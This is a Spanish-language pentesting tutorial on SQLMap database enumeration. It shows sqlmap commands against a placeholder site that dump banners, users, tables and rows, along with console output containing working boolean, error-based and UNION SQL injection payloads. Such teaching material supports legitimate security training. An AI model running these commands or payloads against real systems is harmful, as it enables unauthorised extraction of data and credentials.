Database Enumeration
La enumeración representa la parte central de un ataque de SQL injection, que se realiza justo después de la detección y confirmación exitosa de la vulnerabilidad SQLi del objetivo. Consiste en la búsqueda y recuperación (es decir, exfiltración) de toda la información disponible de la base de datos vulnerable.
SQLMap Data Exfiltration
Para tal propósito, SQLMap tiene un conjunto predefinido de consultas para todos los DBMS soportados, donde cada entrada representa el SQL que debe ejecutarse en el objetivo para recuperar el contenido deseado. Por ejemplo, los extractos de queries.xml para un DBMS MySQL se pueden ver a continuación:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<dbms value="MySQL">
<!-- http://dba.fyicenter.com/faq/mysql/Difference-between-CHAR-and-NCHAR.html -->
<cast query="CAST(%s AS NCHAR)"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
...SNIP...
<banner query="VERSION()"/>
<current_user query="CURRENT_USER()"/>
<current_db query="DATABASE()"/>
<hostname query="@@HOSTNAME"/>
<table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
<column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
<is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
<check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
<users>
<inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
<blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
</users>
...SNIP...
Por ejemplo, si un usuario quiere recuperar el "banner" (conmutador --banner
) para el objetivo basado en MySQL DBMS, se utilizará la consulta VERSION()
para tal propósito.
En el caso de la recuperación del nombre del usuario actual (conmutador --current-user
), se utilizará la consulta CURRENT_USER()
.
Otro ejemplo es la recuperación de todos los nombres de usuario (es decir, etiqueta <users>
). Hay dos consultas utilizadas, dependiendo de la situación. La consulta marcada como inband
se utiliza en todas las situaciones no ciegas (es decir, SQLi basado en UNION y en errores), donde se pueden esperar los resultados de la consulta dentro de la respuesta misma. La consulta marcada como blind
, por otro lado, se utiliza para todas las situaciones ciegas, donde los datos deben recuperarse fila por fila, columna por columna y bit por bit.
Basic DB Data Enumeration
Usualmente, después de una detección exitosa de una vulnerabilidad SQLi, podemos comenzar la enumeración de detalles básicos de la base de datos, como el nombre de host del objetivo vulnerable (--hostname
), el nombre del usuario actual (--current-user
), el nombre de la base de datos actual (--current-db
) o los hashes de contraseñas (--passwords
). SQLMap omitirá la detección de SQLi si se ha identificado previamente y comenzará directamente el proceso de enumeración del DBMS.
La enumeración generalmente comienza con la recuperación de la información básica:
- Banner de versión de la base de datos (conmutador
--banner
) - Nombre del usuario actual (conmutador
--current-user
) - Nombre de la base de datos actual (conmutador
--current-db
) - Verificación de si el usuario actual tiene derechos de DBA (administrador).
El siguiente comando de SQLMap hace todo lo anterior:
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
___
__H__
___ ___[']_____ ___ ___ {1.4.9}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[*] starting @ 13:30:57 /2020-09-17/
[13:30:57] [INFO] resuming back-end DBMS 'mysql'
[13:30:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5134=5134
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY o GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5907 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(5907=5907,1))),0x7178707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7170766b71,0x7a76726a6442576667644e6b476e577665615168564b7a696a6d4646475159716f784f5647535654,0x7178707671)-- -
---
[13:30:57] [INFO] the back-end DBMS is MySQL
[13:30:57] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0
banner: '5.1.41-3~bpo50+1'
[13:30:58] [INFO] fetching current user
current user: 'root@%'
[13:30:58] [INFO] fetching current database
current database: 'testdb'
[13:30:58] [INFO] testing if current user is DBA
[13:30:58] [INFO] fetching current user
current user is DBA: True
[13:30:58] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/www.example.com'
[*] ending @ 13:30:58 /2020-09-17/
En el ejemplo anterior, podemos ver que la versión de la base de datos es bastante antigua (MySQL 5.1.41 - de noviembre de 2009), y el nombre del usuario actual es root
, mientras que el nombre de la base de datos actual es testdb
.
Nota: El usuario 'root' en el contexto de la base de datos en la gran mayoría de los casos no tiene relación alguna con el usuario del sistema operativo "root", aparte de representar al usuario privilegiado dentro del contexto del DBMS. Esto básicamente significa que el usuario de la base de datos no debería tener restricciones dentro del contexto de la base de datos, mientras que los privilegios del sistema operativo (por ejemplo, escribir en el sistema de archivos en una ubicación arbitraria) deberían ser mínimos, al menos en los despliegues recientes. El mismo principio se aplica para el rol genérico 'DBA'.
Table Enumeration
En los escenarios más comunes, después de encontrar el nombre de la base de datos actual (es decir, testdb
), la recuperación de nombres de tablas se haría usando la opción --tables
y especificando el nombre de la base de datos con -D testdb
, de la siguiente manera:
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
...SNIP...
[13:59:24] [INFO] fetching tables for database: 'testdb'
Database: testdb
[4 tables]
+---------------+
| member |
| data |
| international |
| users |
+---------------+
Después de identificar el nombre de la tabla de interés, la recuperación de su contenido se puede hacer usando la opción --dump
y especificando el nombre de la tabla con -T users
, de la siguiente manera:
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
...SNIP...
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name | surname |
+----+--------+------------+
| 1 | luther | blisset |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+----+--------+------------+
[14:07:18] [INFO] table 'testdb.users' dumped to CSV file '/home/user/.local/share/sqlmap/output/www.example.com/dump/testdb/users.csv'
La salida de la consola muestra que la tabla se ha volcado en formato CSV a un archivo local, users.csv
.
Consejo: Además del CSV predeterminado, podemos especificar el formato de salida con la opción --dump-format
a HTML o SQLite, para que podamos investigar más tarde la base de datos en un entorno SQLite.
Table/Row Enumeration
Cuando se trabaja con tablas grandes con muchas columnas y/o filas, podemos especificar las columnas (por ejemplo, solo las columnas name
y surname
) con la opción -C
, de la siguiente manera:
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
...SNIP...
Database: testdb
Table: users
[4 entries]
+--------+------------+
| name | surname |
+--------+------------+
| luther | blisset |
| fluffy | bunny |
| wu | ming |
| NULL | nameisnull |
+--------+------------+
Para restringir las filas según su número ordinal dentro de la tabla, podemos especificar las filas con las opciones --start
y --stop
(por ejemplo, desde la 2ª hasta la 3ª entrada), de la siguiente manera:
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
...SNIP...
Database: testdb
Table: users
[2 entries]
+----+--------+---------+
| id | name | surname |
+----+--------+---------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+--------+---------+
Conditional Enumeration
Si hay un requisito para recuperar ciertas filas en función de una condición WHERE
conocida (por ejemplo, name LIKE 'f%'
), podemos usar la opción --where
, de la siguiente manera:
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
...SNIP...
Database: testdb
Table: users
[1 entry]
+----+--------+---------+
| id | name | surname |
+----+--------+---------+
| 2 | fluffy | bunny |
+----+--------+---------+
Full DB Enumeration
En lugar de recuperar contenido por tabla única, podemos recuperar todas las tablas dentro de la base de datos de interés omitiendo el uso de la opción -T
por completo (por ejemplo, --dump -D testdb
). Simplemente usando el conmutador --dump
sin especificar una tabla con -T
, se recuperará todo el contenido de la base de datos actual. En cuanto al conmutador --dump-all
, se recuperará todo el contenido de todas las bases de datos.
En tales casos, también se aconseja al usuario que incluya el conmutador --exclude-sysdbs
(por ejemplo, --dump-all --exclude-sysdbs
), que indicará a SQLMap que omita la recuperación de contenido de las bases de datos del sistema, ya que generalmente son de poco interés para los pentesters.